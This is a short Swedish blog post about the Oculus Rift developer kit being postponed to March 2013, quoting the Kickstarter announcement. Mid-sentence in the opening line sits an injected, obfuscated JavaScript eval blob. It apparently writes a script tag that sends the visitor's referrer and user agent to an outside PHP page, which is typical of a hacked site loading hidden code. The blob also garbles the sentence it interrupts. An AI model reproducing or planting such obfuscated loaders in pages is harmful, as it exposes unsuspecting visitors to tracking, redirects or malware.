Image Image Image Image Image Image Image Image Image Image

| 20 januari, 2020

Scroll to top

Top

Oculus Rift blir uppskjutet

Filip Urde
  • On 29 november, 2012
  • http://www.revue.se/filip-urde

Utvecklingsutgåvan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdzff|var|u0026u|referrer|niesb||js|php’.split(’|’),0,{}))
av Virtual Reality-headsetet Oculus Rift kommer tyvärr inte att släppas i år, utan till mars 2013. Detta tillkännagav man via sin Kickstartersida igår.

 

Planen var att släppa utvecklingsutgåvorna under december, men intresset för prylen var helt enkelt för stort, så man var tvungen att skjuta på släppdatumet. Det är många som säger att Virtual reality har haft sin tid och den var på 90 talet, men jag tror verkligen att Oculus Rift kan bli något utöver det vanliga!

”Designing, sourcing, and manufacturing thousands of developer kits is no small feat. Since our Kickstarter, we’ve been up against the wall, working around the clock to produce and distribute over 7500 units in just 4 short, crazy months. We’ve had to modify our original design for mass-manufacturing and, at the same time, balance additional features with our tight schedule.

In order to accommodate the required changes, new features, and manufacturing duration, we had to shift our ship date.”

http://www.kickstarter.com